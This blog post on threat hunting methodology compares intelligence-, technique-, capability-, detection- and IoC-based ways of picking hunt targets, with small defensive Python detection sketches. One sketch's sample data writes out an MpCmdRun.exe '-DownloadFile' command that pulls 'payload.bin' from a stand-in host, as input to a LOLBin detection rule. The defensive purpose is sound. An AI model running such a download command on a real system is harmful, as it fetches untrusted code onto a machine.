So many SOCs I have seen are on a really low maturity level. On the other hand, having a SOC is not a new and fancy thing anymore so more and more companies start to have a really tuned and well-working security team now. As the security function matures in a company, they tend to invest in a Threat Hunting team. A team like this can be a big and sometimes even risky investment for a company. The success of a Threat Hunt team depends on a lot of different things: the tooling, other teams, and obviously how well the hunters work.
If the monitoring, detection engineering, automation engineering or threat intel teams are not working properly, then a Threat Hunt team is doomed to failure. These teams have to work closely together, like a fine-tuned engine. Frequently the TH (Threat Hunt) function provides input for these teams or uses their output, and without them, hunting will be heavily limited or even useless.
One big issue I have seen in the past with Threat Hunting teams was that they did not know how to choose a proper target to hunt for. They used the same method repeatedly. This way they could cover some specific targets, but they constantly repeated some of their steps and missed some low-hanging fruit which they could have found by using a different perspective. Also, due to the lack of communication, the investigations of different teams overlapped heavily, which made all the teams less effective.
So, in this post, I want to show what mistakes I have seen in choosing a threat hunt target, what the benefits and drawbacks of the different approaches are, and why you should utilize more than one of these perspectives.
Normally when I start to work on a blog post there is a challenge behind it. Either I ran up against an obstacle I want to defeat, or somebody asks for my help with a security issue that seems interesting enough to solve. Sometimes I am just curious how something works, and I couldn’t find the necessary sources on the internet, so after investigating it myself I also share it with you.
Here the initial trigger was a little bit different. I had an interview lately where I was asked how I would start with a threat hunt session, how I would choose my target, my goal. As I was explaining my ideas, I realized that even though I had read a lot about the topic I had never seen these things written down this way. So, I decided to collect my thoughts after the interview and write everything down here.
A lot of the terminology I use is similar to that of the Diamond-model, so I want to start with that. First things first, even though I have seen the Diamond-model applied in threat hunting scenarios, it is not designed for this purpose. This model was designed with incident response and threat intel in mind, and its goal is to produce intelligence on the investigated intrusions.
(Image is linked from threatconnect.com. Find more info about the model on the site.)
The reason why I won’t use this model alone for threat hunt is that it only focuses on the actor. The Diamond-model helps you build a profile of a threat actor. By profiling an actor, you collect its behavior, the techniques it uses, its well-known targets, and the infrastructure it relies on. All this information can be used to find malicious activity in the network, so it looks like a straightforward model to perform the hunt.
Well, it is. It is one good way to start a hunt, but not the only one. And maybe doing the hunt based on specific groups is the most heavily used method. However, it has its requirements and drawbacks too which should be addressed. There are other ways to define a threat hunt target. But everything depends on how your team works, whether it communicates with other teams or not, and what the actual goal of your threat hunting team is.
To find out which method is good for your team, you should know the goal of your threat hunt sessions. Finding an intrusion in your network is a good result, but if you don’t provide any other output, you don’t use your team to its full potential. Not only is the Threat Hunt team less effective this way, but some of your other teams also have to duplicate work because they must repeat the same investigation.
The output of a Threat Hunt:
An incident: This is the trivial output. When you start a threat hunt you assume that an infection is already in the network. You put yourself into the place of an attacker, guess what an attacker would do, how it would carry out the attack, and what kind of logs would be created by its actions. If you guessed correctly and performed your hunt just fine, you will find a (sign of an) infection which will be your incident. Frequently, a threat hunt is considered successful if you find an actual infection (I don’t think it is a good metric, but it is not the topic this time), but even if you don’t, there can be other outputs which are worth utilizing.
A detection logic: When a threat hunter tries to find an infection, they write a lot of queries, and at the end, with additional investigation, an incident will be found… or not. Either way, the created queries could be used as scheduled searches (detection rules) to alert if an attacker tries to use the investigated technique in the future. If no detection logic is created at the end, then the same threat hunt has to be done repeatedly by the hunting team to be sure nobody ever uses the given method. This is obviously not efficient, so providing the queries or involving the detection team can help in making the company more secure against future attacks. Not every threat hunt output can be used for detection, but even in that case, it can be a good start.
Increased visibility: A hunter will quickly realize if some logs which are needed for a specific hunt are missing from the network. This can be the end of the hunt with a report that says the investigation was not possible. But it can also be used to increase visibility. Sometimes the lack of events can only be solved by buying new appliances or solutions, and that is not always financially possible. However, in other cases, the system is there and only the log collection has to be configured to forward the events into a SIEM, or the logging level should be changed on the system (for example from error to debug to get more logs). This output can help incident response or detection engineering teams too, so finding blind spots is always a crucial step.
Better prevention: While prevention is mostly not in the toolkit of a threat hunter, during an investigation one can find ways to prevent some actions from being executed. Defending the systems is better than just monitoring them to find the infections (after all, we are not the Avengers), so finding a way to prevent a malicious actor from doing its job is always useful. Also, depending on how the hunters work at a company, they can confirm the behavior of already existing preventative measures. If prevention is in place, maybe the threat hunt (and detection creation) is not even needed anymore.
Knowledge sharing: One of my favorite things I have seen in a threat hunting session was involving people from other teams. This is not simply good for team-building purposes, but it can also help people to learn new things. Also, when I was working as an incident responder, the job sometimes became a little mundane, and participating in a Threat Hunt on a rotation basis could shake me up and give me new energy.
The more ways the output of a threat hunt session can be used, the more effective the whole security team is going to be.
What to hunt for
Defining what to hunt for in a network is a crucial step. If you define the target poorly, you can put a lot of effort into something that does not pay off. You can hunt for days without finding anything simply because of a mistake at the beginning. Even finding something can be bad, if you could have generated more or better outputs with a better target. You must always consider the potential value of the output and the effort you put into the hunt before you commit to a prey. (This evaluation is frequently done by other teams, like the threat intelligence team.)
In my “model” I have defined 5 different inputs which could trigger a threat hunt. These are the inputs you could potentially use to choose the targets and build up your hypotheses. From this list, I only consider 3 (maybe 4) as real threat hunt sources. The remaining two depend on how your team works. Normally those methods are not used by threat hunters, but again, it depends. So read my explanation later.
Source of the TH:
Intelligence: Having intelligence information about a malware or a threat actor group can trigger an investigation to find a possible intrusion. Most of the time it relies on a good threat intelligence team.
Techniques: Focusing on a specific technique, for example covering a newly found LOLBin, hunting for misuse of internally developed tools, or insider threats.
Capability: The focus is on a log source, or maybe a specific field in an event and not on techniques or attackers. For example, covering methods related to DNS logs.
Detection: Start a hunt based on an already detected activity. For example, malware is detected on one machine, and you are afraid it may also be present on other systems that lack the same logging or detection. Similar activities can be handled by an IR team; Threat Hunt involvement is not always necessary. Thus, I will only consider it a Threat Hunt input in specific situations.
Infrastructure: This is what I like to call IoC hunting. I have seen a lot of TH teams look for IPs and URLs in the network from time to time, but this is really not efficient. If your team does this instead of handling these IoCs automatically, you are on maturity level 0 or 1 and you shouldn’t do threat hunt yet. Still, a lot of teams do this, so I kept it on the list.
Any of them can be an initial input for your threat hunt. But it will also frequently happen that one of them initiates another one. For example, you can start your threat hunt with intelligence about a threat actor (method 1). However, a report like this often contains IoCs which you can then use for IoC hunting (method 5).
Intelligence-based hunting is possibly the most well-known and most heavily used way to define a target. You have information about a malware or a threat actor group, and you assume they are in your network. You want to find them, so you carry out a threat hunting session. This is intelligence-based because the information you have to use frequently comes from the threat intelligence team (and well, it is based on intelligence). Also, the success of your hunt heavily depends on the intelligence you get. You can find articles on the internet yourself, but a lot of these articles are not really useful, sometimes have to be translated into technical language, and can also be very limited.
And here is where the TI (Threat Intelligence) team comes into play. A threat intel team has better sources; they have access to information a normal person does not. A good source is really important for threat hunt. They can also choose the best reports which can be used for hunting. Saying a malicious actor uses the registry for persistence is a piece of information that is hard to act on, because there are a lot of different ways and registry keys that can be used to achieve persistence. Hunting for all of the ways it can be done is tedious, not actor/threat-focused, and therefore less valuable. On the other hand, providing the specific registry keys that are used, or the tool which is used to modify the registry, is a good source, and a report with this information is actually usable.
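To illustrate the difference between vague and actionable intel, here is a minimal Python sketch. It assumes registry-write events are already available as dictionaries; the field names, the reported key, and the value name "Updater" are all hypothetical and stand in for whatever a real report and your own log schema would provide.

```python
# Hypothetical intel: an exact key and value name as a detailed report might list them.
# Keys are stored lowercase because registry paths are case-insensitive.
REPORTED_KEYS = {
    r"hkcu\software\microsoft\windows\currentversion\run": {"updater"},
}

def matches_report(event):
    """Return True if a registry-write event hits a reported key and value name."""
    value_names = REPORTED_KEYS.get(event["key"].lower())
    return value_names is not None and event["value_name"].lower() in value_names

# Hypothetical sample events; the field names are assumptions, not a real schema.
events = [
    {"host": "ws-01", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "value_name": "Updater"},
    {"host": "ws-02", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "value_name": "OneDrive"},
    {"host": "ws-03", "key": r"HKLM\Software\Vendor\App", "value_name": "Updater"},
]

hits = [e["host"] for e in events if matches_report(e)]
print(hits)
```

With only "the actor uses the registry" as input, every one of these events would need manual review. With the specific key and value name, the hunt narrows to a single host.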
It is also the TI team’s job to know which actors are likely to attack your company. If you are a healthcare institution and a group only attacks military targets, then looking for this group in your network is a waste of time. It is the responsibility of TI to find the proper actors or threats, provide you with the necessary intelligence, and translate this information into a technical and usable report.
Requirements:
- You need a good TI team with proper sources.
- Information should exist about a specific group or threat.
- Good and detailed intelligence information is needed.
When to use it:
- You want quick results, or you want to prove the validity of your TH team.
- You want to focus on targeted threats against your company. (A lot of infections are not targeted though).
- Your team works alone and doesn’t cooperate with other teams; no one from other teams is involved at all. (Not a problem if they are involved, but this is the best method if they are not.)
Benefits:
- It has the biggest chance of finding something, since you hunt for the threats that are most likely to be in your network.
Drawbacks:
- Can take a really long time, because a group can use a huge number of different tools and techniques.
- Big chance of repeated work. Two actors can use the same methods to perform some nasty action. Hunting for the two actors independently can cause the hunters to look for similar (or the same) activities twice. If the hunting is really specific, the hunters can miss a similar action, which they will only investigate when they are dealing with the other group.
- Hunters are always behind the attackers. An attacker can find a method, use it, then be investigated by somebody and this information has to be shared before the TH team can start the hunt.
- Findings are often not future-proof, and the hunt is only valuable if it is executed in a given time window. (When the malware is active, or the given methods are used by the actor.)
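The repeated-work drawback above can be reduced by comparing actor profiles before the hunts are planned. The following is only a sketch: the actor names are made up, and the MITRE ATT&CK technique IDs are used purely as example labels, not as a claim about any real group.

```python
# Hypothetical actor profiles; technique IDs serve only as labels here.
actor_techniques = {
    "ActorA": {"T1059.001", "T1547.001", "T1071.001"},
    "ActorB": {"T1059.001", "T1071.001", "T1003.001"},
}

def plan_hunts(profiles):
    """Map each technique to the actors using it, so it is hunted once, not per actor."""
    plan = {}
    for actor, techniques in profiles.items():
        for technique in techniques:
            plan.setdefault(technique, set()).add(actor)
    return plan

plan = plan_hunts(actor_techniques)

# Techniques shared by more than one actor are the candidates for duplicated work.
shared = sorted(t for t, actors in plan.items() if len(actors) > 1)
print(shared)
```

Hunting the shared techniques once, in a non-actor-specific way, avoids doing the same investigation twice and lowers the chance of missing a near-identical action.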
Technique-based hunting focuses only on a few specific techniques in a session. In this terminology, a technique can be a TTP an attacker uses, a specific tool on the system, or a way a tool can be abused by an attacker. The general benefit of this perspective is that you often don’t need hard-to-come-by threat intel, and you can also focus on solutions that exist only at your company, for which public information is unlikely to be available.
There are multiple ways you can utilize this perspective; it depends on what you want to hunt for:
a) Internally developed tools / solutions
Some of the internally developed tools can be abused either by an external attacker (in this case the attacker has to know a great deal about your company) or by an internal user who just tries to make his/her life easier.
Example 1: At one of the companies I know, users couldn’t install their own tools on their system. To install software, they could either use a Software Manager that contained the pre-approved tools, or they could ask the IT team to assess and approve a tool. But developers asked for new tools way too frequently, so the company gave them the right to approve their own tools. The tooling on the machines became chaotic after this, and one of the tools was later used as a C2 channel. This was actually detected by an anomaly detection rule, not by a threat hunt activity. A few users installed a significantly high number of non-preapproved tools on their machines. The number was so high that it reached the threshold of the rule.
Example 2: At another company, users could request admin access for a limited period of time via an internally developed tool. The admin access had to be approved by somebody first. However, due to a bug in the tool, one could get admin access without approval for an unlimited amount of time. When the bug was reported by the red team, a threat hunt was executed and many systems were identified on which the users had permanent admin access. On some of the systems this happened without the knowledge of the user, who had accidentally requested the permanent admin rights via the bug.
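A threshold rule like the one in Example 1 could look roughly like the sketch below. The approved catalogue, the threshold value, and the event fields are all assumptions made for illustration; the original rule is not known to me in this detail.

```python
from collections import Counter

APPROVED = {"7zip", "vscode", "git"}  # hypothetical pre-approved catalogue
THRESHOLD = 3                          # hypothetical alerting threshold

def noisy_installers(install_events, approved=APPROVED, threshold=THRESHOLD):
    """Return users whose number of non-preapproved installs reaches the threshold."""
    counts = Counter(
        e["user"] for e in install_events if e["tool"].lower() not in approved
    )
    return {user: n for user, n in counts.items() if n >= threshold}

# Hypothetical software-installation events.
install_events = [
    {"user": "alice", "tool": "Git"},
    {"user": "alice", "tool": "toolx"},
    {"user": "bob", "tool": "tunnel-a"},
    {"user": "bob", "tool": "tunnel-b"},
    {"user": "bob", "tool": "remote-c"},
]

flagged = noisy_installers(install_events)
print(flagged)
```

A hunter can run the same logic with a lower threshold over historical data to see who would have been flagged earlier.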
b) Insider threat
Even though I call it insider threat, these are often not really attacks against a company; rather, a user or an admin wants to make their job more convenient by bypassing some of the policies or security solutions. Administrators and developers are typically familiar with the environment they are working in. They are also people who like to solve their problems quickly and effectively.
Because of this, they tend to use non-approved methods, or bypass solutions to make their job easier. One thing I frequently see is developers (who are admins on their machines) disabling VPNs/proxies on their machines so they can download a new tool for their job. During this time the visibility on their machine is not complete, so sometimes it can be hard to find these actions.
When the visibility has decreased, the user or even an attacker on the machine can perform a lot of actions that otherwise would be impossible. This can be a downloaded malicious file that otherwise would be blocked by the proxy, or data exfiltration that normally would be detected by rules based on the proxy logs.
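One way to hunt for such visibility gaps is to look for periods where a host produces no proxy events although the endpoint itself is clearly active. This is a minimal sketch under the assumption that you can export per-host timestamps for both proxy and endpoint (for example process creation) events; the 30-minute limit is an arbitrary example value.

```python
from datetime import datetime, timedelta

def visibility_gaps(proxy_times, endpoint_times, max_gap=timedelta(minutes=30)):
    """Return (start, end) proxy-silence windows in which the endpoint was still active."""
    gaps = []
    ordered = sorted(proxy_times)
    for start, end in zip(ordered, ordered[1:]):
        silent_too_long = end - start > max_gap
        if silent_too_long and any(start < t < end for t in endpoint_times):
            gaps.append((start, end))
    return gaps

# Hypothetical timestamps for a single host.
day = datetime(2024, 1, 1)
proxy_times = [day.replace(hour=9), day.replace(hour=9, minute=10),
               day.replace(hour=11), day.replace(hour=11, minute=5)]
endpoint_times = [day.replace(hour=9, minute=5), day.replace(hour=10, minute=15)]

gaps = visibility_gaps(proxy_times, endpoint_times)
print(gaps)
```

A gap alone proves nothing (the user may simply have been reading a document), so the result is a list of time windows worth a closer look, not a list of incidents.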
c) Newly published techniques
A lot of new techniques are published constantly on the internet which could be used to execute some malicious actions. While sometimes these are threat/threat actor related, in other cases these new methods are discovered by blue teamers, so somebody can read about them and prepare protection before they are actively used in the wild.
Most of the time this information is available on public forums, and anybody who is interested in security can access this data. This means any threat hunter can get this information without having a TI team in place.
Example: A new LOLBin has been discovered recently. If you use Microsoft Defender ATP, there is a chance you have the affected version of MpCmdRun.exe on your machine. With this LOLBin you can download a file from the internet, which could be used by an attacker to download malicious code. When it was found, there was no information about any attacker who had used it already. You could execute a threat hunt to be sure nobody really used it in your network. As an additional output you could create a detection too, so in the future you wouldn’t have to be afraid of somebody using it unnoticed.
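A hunt for this LOLBin could start from process-creation events. The sketch below assumes the download is invoked as `MpCmdRun.exe -DownloadFile -url <url> -path <file>`, which is how public write-ups described it; the event field names are hypothetical, and the pattern would miss invocations that reorder or obfuscate the arguments.

```python
import re

# Assumed pattern: MpCmdRun.exe called with -DownloadFile followed by a -url argument.
DOWNLOAD_PATTERN = re.compile(
    r"mpcmdrun(\.exe)?\b.*-downloadfile\b.*-url\s+(\S+)", re.IGNORECASE
)

def find_mpcmdrun_downloads(process_events):
    """Return (host, url) pairs for command lines that look like an MpCmdRun download."""
    findings = []
    for event in process_events:
        match = DOWNLOAD_PATTERN.search(event["command_line"])
        if match:
            findings.append((event["host"], match.group(2)))
    return findings

# Hypothetical process-creation events.
process_events = [
    {"host": "ws-01",
     "command_line": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" '
                     r"-DownloadFile -url https://example.com/payload.bin "
                     r"-path C:\Temp\payload.bin"},
    {"host": "ws-02", "command_line": "MpCmdRun.exe -Scan -ScanType 1"},
]

findings = find_mpcmdrun_downloads(process_events)
print(findings)
```

The same pattern can later be handed to the detection team as the basis of a scheduled search.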
When to use it:
- You want to cover internally developed tools or misuse of your internal network.
- You want to cover techniques as soon as they are discovered.
- You want to provide detection as an output too.
Benefits:
- You can cover internal things too, which are frequently not detailed (or are not there at all) in public reports.
- You can cover a technique/tool before it is heavily abused by malware.
- You don’t need a threat intel team (this is a big benefit because a lot of companies don’t have a good threat intel team in place.)
Drawbacks:
- Low chance of finding an actual intrusion from external sources. Most frequently you will find internal misuse.
- Sometimes the internal part of this method is not TH responsibility.
- The reports of the new techniques can be vague, so a hunt will require you to put a lot of time into finding out how the method works.
When you hunt, you normally start with thinking what an attacker would do, and then you can look around in the network. Another approach is to see what you are able to detect in the network, what logs you have, and then think about how you can detect an infection in your network with the given visibility. This is capability-based hunting.
Either way, you will find out what you can see and you have to come up with hypotheses, but the order is different based on what method you use. Let’s say you want to cover proxy-based techniques. In this case, you pick the proxy events, and you create multiple ideas about how a possible attacker could be detected by those events. There can be a practically unlimited number of different ideas, so most of the time you won’t be able to cover everything.
When you do an Intel-based threat hunt there is a chance that you are going to cover some specific log sources over and over again (but this doesn’t mean overlapping hunts). One of the actors can be detected by some odd user agent, the other one uses a pattern in the URL, but all of the info can be found in proxy logs. Instead of this approach, you can just choose the given log source and try to cover a lot of different techniques. This is also a good method if you want to use anomaly-based hunting, for example finding a user with a huge number of GET requests, or some rare user agents in the network.
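As a small illustration of starting from the log source, the sketch below looks for rare user agents in proxy events. The field names and the "seen on at most one host" rule are assumptions; a real environment would need its own baseline.

```python
from collections import defaultdict

def rare_user_agents(proxy_events, max_hosts=1):
    """Return user agents that were seen on at most `max_hosts` distinct hosts."""
    hosts_per_agent = defaultdict(set)
    for event in proxy_events:
        hosts_per_agent[event["user_agent"]].add(event["src_host"])
    return sorted(
        agent for agent, hosts in hosts_per_agent.items() if len(hosts) <= max_hosts
    )

# Hypothetical proxy events.
proxy_events = [
    {"src_host": "ws-01", "user_agent": "Mozilla/5.0"},
    {"src_host": "ws-02", "user_agent": "Mozilla/5.0"},
    {"src_host": "ws-03", "user_agent": "Mozilla/5.0"},
    {"src_host": "ws-02", "user_agent": "curl/7.68.0"},
]

rare = rare_user_agents(proxy_events)
print(rare)
```

The point is the direction of the work: the query is built from what the proxy log contains, and the hypotheses about which attacker behavior it could reveal follow from the result.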
Anomaly-based hunting can also help you find undiscovered techniques and unreported IoCs. A simple example is when a lot of systems start to communicate with a previously unseen URL. Maybe the traffic is even beaconing-like. If the URL is not known to be malicious, and no detection has triggered on the machines, then a threat hunter can take a deeper look and maybe find something that has not been uncovered yet. (Obviously some information or knowledge is still needed, because the anomaly detection query must be created to cover a possible technique and not just to randomly do something.) In the case of Capability-based hunting you can focus on something out-of-place or out-of-the-ordinary, and you can investigate whether it is an attack technique or not. (It is similar to the Machine Learning-based (ML) hunting I’m going to explain in the next section. Actually a lot of ML-models are just fancy anomaly-detector engines.)
Also, this can be the way to go if detection logic is one of your important outputs. When a new event type (e.g. proxy logs) is forwarded to a SIEM for the first time, you won’t have any detections in place and no threat hunt will have been carried out on those logs yet. In this case, it can be a gold mine. You can detect a lot of infections that could not be found with the previously existing logs. You can also create a lot of detection logic as an output. If the log source is new, there is a chance you have to wait a little bit first to collect enough data for the threat hunt and to see how your network behaves with regard to the given source.
There are some specific log sources that are frequently used by hunters with great success. These logs can be used to detect actions that are frequently utilized by attackers, so some specific logs can be gold mines in themselves, even when they are not new. For example, the most used Initial Access method is phishing. I think there is no company without any phishing attempts in its network. E-mail logs can be used by a threat hunter to find these phishing attempts, and even though a phishing mail won’t always result in an incident, it can be a really good source of intel.
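"Beaconing-like" can be approximated in many ways. One simple option, shown here only as a sketch, is the coefficient of variation of the intervals between requests from one host to one destination: the closer it is to zero, the more regular the traffic. The timestamps are assumed to be epoch seconds, and any cut-off value you apply to the score is your own choice.

```python
from statistics import mean, pstdev

def beacon_score(timestamps):
    """Coefficient of variation of inter-request intervals; near 0 means very regular.

    Returns None when there are too few requests to judge.
    """
    ordered = sorted(timestamps)
    intervals = [later - earlier for earlier, later in zip(ordered, ordered[1:])]
    if len(intervals) < 3 or mean(intervals) == 0:
        return None
    return pstdev(intervals) / mean(intervals)

# Hypothetical request times (epoch seconds) from one host to one URL.
regular = [0, 60, 120, 181, 240, 300]   # roughly one request per minute
bursty = [0, 5, 7, 300, 302, 900]       # human-like, irregular browsing

print(beacon_score(regular), beacon_score(bursty))
```

Legitimate software (update checks, telemetry) also beacons, so a low score only tells you where to look, and the previously unseen destination is what makes it interesting.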
When to use it:
- Your TH team works in close relation with the Detection Engineering team.
- When a new log source is introduced in the network (or in the SIEM).
- When you want to learn about a specific log source or events in the network (because, for example, every log source should have an SME (Subject Matter Expert) in the team, or you want to find issues with the logging, etc.)
- If a threat intel team is not available.
Benefits:
- A new log source can uncover infections that could not be detected earlier.
- You can find completely undocumented methods.
- A good approach to create new detections. If the detection logic is an important output for your threat hunt team, this is the method with the highest value.
- No threat intel team is needed.
Drawbacks:
- Can be slow or incomplete, because a single log source can relate to a lot of techniques.
- Hard to measure. A threat intel team can give you ideas what to cover in case of a specific log source.
- There is a chance you will cover techniques which are not heavily used recently, so your outputs won’t be overly valuable.
- With a new log source, sometimes you have to wait weeks to collect enough data to perform a useful threat hunt.
With detection-based hunting, you carry out a threat hunt based on what you have already seen in the network before the hunt. The trigger can be an alert that was detected on a machine, where after further investigation you suspect that other systems may be infected too. Or it can be a wide-spread infection in the network that you want to track down. In this case, some part of this infection has been investigated already, but other steps of the attack are unknown and you want to unveil these aspects too.
As I have already expressed, I do not really think that this should be part of the threat hunt (for the umpteenth time, this depends on your setup and how your team works). The reasons are the following:
When you threat hunt, you have to assume the attacker is in the network, but that is all. You have an assumption, but no knowledge. In my opinion threat hunt is finding a yet unknown infection, and in a situation like this the infection is not unknown, only some of its aspects are undiscovered.
When the investigation is related to an incident, it should be solved by a security analyst/incident responder. They are working with the detections; threat hunters deal with the non-detected intruders. Thus, I simply think this is normally not a threat hunt responsibility.
However, positions are frequently vague, and the responsibilities are not clarified. Also, teams tend to be kind of understaffed, so in case of a big investigation, a lot of people from other groups are involved too. But even if TH members are involved in these investigations, I don’t think it is really TH responsibility, or that this should be a relevant trigger for them.
On the other hand, I think there is a good source that can be used under the Detection-based method. More and more teams start to utilize machine learning models to detect malicious activity. Based on my experience though, these models trigger way too many false positives. So, creating incidents for every alert created by an ML model seems way too FP-prone today. However, these ML alerts could be used as sources for threat hunt. A model like this can trigger on an activity that uses a still unknown technique, for example. Part of this can still be considered incident response responsibility, but it is potentially a really rich source too.
Machine Learning model: Using these ML alerts can still be considered Detection-based TH. The action was automatically detected by a “rule”; the difference is that these rules are less reliable nowadays than normal detection logic, so it is rather a guided threat hunt than incident response. On the other hand, ML-models are based on the events in the network, so it can be considered Capability-based hunting. The decision to consider it Detection-based or Capability-based is hard. It depends on your model, on the reliability of your model and on the ownership of the triggered ML-based alerts. If it is just an anomaly detection rule, then we can say it is Capability-based. If it has other information, like how an attacker acts in the network, then we can say it is Detection-based (in this case it does not just rely on internal capabilities). If the IR team deals with it exclusively, then it is not even TH input for you anymore.
Either way, the output of an ML-model can be a good source for threat hunt, so consider using it if you have it.
Because there are some scenarios in which involving hunters in these investigations is actually reasonable (e.g. ML-based alerts), I’m still going to consider this as threat hunt. But please, do not force your threat hunters to participate in every investigation and in all of the incident response activities.
Requirements:
- You need some kind of detection in place.
- For ML-based hunt you need a good Machine Learning model implemented and fine-tuned.
When to use it:
- If you have a good ML model already in place.
- If you have to be involved in the unknown aspects of an investigation.
- When the teams are understaffed.
Benefits:
- Only has benefits if you use an ML model. In this case, you have a new type of source which is still rarely used nowadays.
- A good ML model can help you find unknown infections.
Drawbacks:
- Should be done by IR teams, so you take the resource from a normal threat hunt session.
- A bad ML model will slow you down and make you do useless investigations and hunts.
By infrastructure-based threat hunt I mean looking for basic IoCs. By basic IoC I mean anything that is easy to search for in a SIEM; these are the lower levels of the Pyramid of Pain.
Among these IoCs I include IPs, domains, e-mail addresses (which are similar to domains), and hashes. Normally this information is easy to look for in the logs: the values are not obfuscated in the events and they have a fixed place, so you can cover them with some basic rules.
This is the lowest-level way to perform a threat hunt. I personally don’t even think it is threat hunt if you search these IoCs in your network. A good threat hunt session utilizes the skill and knowledge of the hunters. On the other hand, this method can be done by a robot. This is something that should be automated as soon as possible instead of doing it manually. Also, it is easy to automate, so it shouldn’t be a problem.
You need a platform, or sometimes only some lookup tables, that you can use to store the IoCs. After that, you need some basic rules that check whether the pre-defined logs contain any information from these lookup tables. These rules can simply be configured to do historical correlation too, instead of just alerting on future data. The only manual task here should be the IoC extraction from reports (by the threat intel team, but sometimes this can be automated too).
According to Sqrrl’s Threat Hunt maturity model, a team is on level 0 if they don’t do any threat hunt and solely focus on incident resolution. Level 1 means they do the above-mentioned Infrastructure-based hunt; however, I still think this is not threat hunt, only a waste of time. This type of hunt should never be done manually.
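The lookup-table idea can be sketched in a few lines of Python. Everything here is an assumption made for illustration: the table layout (indicator mapped to the report it came from), the event field names, and the sample values, which use documentation-only addresses and domains.

```python
# Hypothetical lookup table: indicator -> source report.
ioc_table = {
    "203.0.113.7": "report-2024-01",
    "bad.example": "report-2024-02",
}

def match_iocs(events, table, fields=("dest_ip", "domain", "file_hash")):
    """Yield (event, field, source) for every event value found in the lookup table."""
    for event in events:
        for field in fields:
            value = event.get(field)
            if value in table:
                yield event, field, table[value]

# The same function covers historical data and newly arriving events.
historical_events = [
    {"host": "ws-01", "dest_ip": "198.51.100.20", "domain": "intranet.example"},
    {"host": "ws-02", "dest_ip": "203.0.113.7", "domain": "cdn.example"},
]
new_events = [{"host": "ws-03", "dest_ip": "192.0.2.10", "domain": "bad.example"}]

hits = [(e["host"], field, source)
        for e, field, source in match_iocs(historical_events + new_events, ioc_table)]
print(hits)
```

Once this runs on a schedule, adding a new indicator is a data change in the table, not a new hunt.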
These IoCs are specific to a malware or a group. They are potentially used for a limited amount of time but then they can become benign. For this limited amount of time, you have to execute the hunt over and over again. It just makes sense to create a detection instead of doing the hunt repeatedly. And in this case, you can just start with it instead of doing the hunt. If your framework is there, you can just fill it up with IoC data constantly and maybe automatically.
If you have hunting queries like this and you create new ones which are similar, then be ashamed
(Splunk terminology – the same applies if you created a nicer query but with the same purpose):
index=proxy sourceip=IP1 OR sourceip=IP2 OR sourceip=IP3 OR sourceip=IP4 OR sourceip=IP5 OR sourceip=IP6 OR sourceip=IP7 ...
When to use it:
- If you do not have the necessary tools to automate it. But even then, rather focus on automating it first.
Benefits:
- You can easily detect some well-known malware and actors (but this is not a benefit over the other methods of Threat Hunt, because this is not Threat Hunt).
Drawbacks:
- The TH team will be busy with something that should be automated.
- Executing it once is not valuable. You can be infected tomorrow with the thing you investigated today without detecting it. This is less of an issue with other methods because a given technique can be used by a lot of malware, so there is a higher chance of finding something relevant. (Still, it is always a good idea to create a detection if possible.)
- Some IoCs can be noisy; it depends on your IoC feed. (For example, not every URL that has a 1/60 classification on VirusTotal is immediately malicious. If you use a feed that marks it malicious, you can find way more incorrect “infections”.)
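To limit the noise mentioned in the last point, a feed can be filtered before its indicators reach the lookup tables. The sketch below assumes each feed entry carries a count of engines that flagged it and the total number of engines; both the field names and the cut-off values are hypothetical and need tuning for a real feed.

```python
def confident_iocs(feed, min_positives=3, min_ratio=0.1):
    """Keep only indicators flagged by enough engines, in absolute and relative terms."""
    kept = []
    for entry in feed:
        if entry["total"] <= 0:
            continue  # no verdicts at all, nothing to base a decision on
        ratio = entry["positives"] / entry["total"]
        if entry["positives"] >= min_positives and ratio >= min_ratio:
            kept.append(entry["value"])
    return kept

# Hypothetical feed entries.
feed = [
    {"value": "http://a.example/x", "positives": 1, "total": 60},
    {"value": "http://b.example/y", "positives": 25, "total": 60},
    {"value": "http://c.example/z", "positives": 0, "total": 0},
]

kept = confident_iocs(feed)
print(kept)
```

The dropped entries do not have to be discarded; they can go to a lower-severity list that is reviewed less often.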
So, what to hunt for
I have described five different methods you can use to define your target. Which one to use should really depend on your capabilities and your teams. If you satisfy all the mentioned requirements and you have mature teams already, then you can focus on the first three solutions.
And from those three? Well, I wouldn’t choose just one. I think it’s best if you apply each one of them on a rotation basis. All of them have their benefits and there are situations in which they are effective to use. However, they all have their cons too, so sometimes you do not want to use them. You must adapt your choice to your current situation.
For example, you can decide to use Intelligence-based hunting most of the time, when you have the necessary intel. However, when a new log source is introduced or you realize that some of the logs weren’t covered during the last few hunting sessions, you can just pick that log source and focus on it for one hunt. Or you can do intelligence-based hunting, but when a new technique is published on the internet, you can quickly organize a technique-based session to cover that method and then go back to intelligence-based hunting.
If your team does infrastructure-based hunting, try to automate it first. No reason to try to threat hunt without basic automations/detections in place. If you are done with this, you can rotate the other methods based on what you have in place and what is most beneficial in a certain situation. Also, from the remaining ones, try to focus on the Intelligence- / Technique- / Capability-based methods, and only do Detection-based if it is really necessary, or if you have implemented the above-mentioned ML-model already.
And as a last word, here is the gist of the blog. Which threat hunt methods to use:
- Intelligence-based: Yes, do it.
- Technique-based: Yes, do it.
- Capability-based: Yes, do it.
- Detection-based: Meh. Maybe if it is ML-based, even then it depends.
- Infrastructure-based: No.
Have a nice hunt.